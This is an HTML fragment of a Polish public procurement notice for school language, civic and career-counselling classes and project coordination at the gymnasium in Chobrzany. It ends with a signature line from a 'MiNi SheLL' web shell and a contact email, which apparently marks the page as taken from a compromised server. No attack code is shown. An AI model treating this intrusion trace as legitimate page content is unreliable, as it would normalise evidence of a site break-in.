<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zajęcia rozwojowe z j. angielskiego z wykorzystaniem ICT.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia rozwojowe z j. angielskiego z wykorzystaniem ICT - 360 godzin lekcyjnych (3grupy x 60 godz. w jednym roku szkolnym x 2 lata szkolne). Zajęcia będą realizowane w trzech grupach wiekowych uczniów  z kl. I-III gimnazjum w Chobrzanach. Zajęciami będzie objętych 30 uczniów G.
Zajęcia z naciskiem na kształcenie niezależności w myśleniu, ocenę i działania w połączeniu z umiejętnościami sprawnego i odpowiedzialnego komunikowania się w języku obcym. Podczas zajęć stosowane będą ćwiczenia z programami multimedialnymi oraz tablice interaktywne.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zajęcia rozwojowe z j. niemieckiego z wykorzystaniem ICT.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia rozwojowe z j. niemieckiego z wykorzystaniem ICT - 360 godzin lekcyjnych (3grupy x 60 godz. w jednym roku szkolnym x 2 lata szkolne). Zajęcia będą realizowane w trzech grupach wiekowych uczniów  z kl. I-III gimnazjum w Chobrzanach. Zajęciami będzie objętych 30 uczniów G.
Zajęcia z naciskiem na kształcenie niezależności w myśleniu, ocenę i działania w połączeniu z umiejętnościami sprawnego i odpowiedzialnego komunikowania się w języku obcym. Podczas zajęć stosowane będą ćwiczenia z programami multimedialnymi oraz tablice interaktywne.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zajęcia rozwojowe kształtujące świadomość obywatelską.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia rozwojowe kształtujące świadomość obywatelską- 360 godzin lekcyjnych (3grupy x 60 godz. w jednym roku szkolnym x 2 lata szkolne). Zajęcia będą realizowane w trzech grupach wiekowych uczniów  z kl. I-III gimnazjum w Chobrzanach. Zajęciami będzie objętych 20 uczniów G.
Pogadanki i wykłady na temat charakteru społeczności lokalnej, roli samorządu, inicjatyw lokalnych i roli społeczeństwa obywatelskiego. Planowane są udziały w sesji rady gminy, w rozprawach sądowych czy spotkania z przedstawicielami władz lokalnych. Planowane są symulacje rozprawy sądowej i sesji rady. Zorganizowane zostaną wybory młodzieżowe do europarlamentu i kampania profrekwencyjna w środowisku lokalnym.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Spotkania uczniów z doradcą zawodowym w ramach Szkolnego Ośrodka Kariery.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Spotkania uczniów z doradcą zawodowym w ramach Szkolnego Ośrodka Kariery - 350 godzin spotkań z uczniami kl. I-III G w Chobrzanach. W ramach spotkań 70 uczniów gimnazjum odbędzie po 5 godzin indywidualnych spotkań z doradcą zawodowym.
W ramach zadania utworzony zostanie Szkolny Ośrodek Kariery, w którym uczniowie będą poznawać swój potencjał w kontekście możliwości rozwojowych, poznawać swoje atuty, uczyć się zarządzać swoją karierą. Uczniowie otrzymają teczki (Indywidualny Planer Kariery) w oparciu o które będą poznawać metody autoprezentacji oraz naucza się przygotowywać dokumenty aplikacyjne. Zajęcia mają na celu rozwijanie postaw przedsiębiorczości  i pomoc w radzeniu sobie w trudnych sytuacjach. Ponadto przygotują młodzież do trafnego wyboru zawodu, drogi kształcenia, roli pracownika.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Koordynowanie działań projektowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Koordynowanie działań projektowych:
1. przez koordynatora projektu - 22 miesiące (średnio 100h miesięcznie, łącznie 2200 godzin w okresie realizacji projektu w ZPO w Chobrzanach), 
2. przez asystenta koordynatora - 22 miesiące (średnio 60h miesięcznie, 1320 godzin w okresie realizacji projektu w ZPO w Chobrzanach)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 79.42.10.00-1, 75.11.21.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com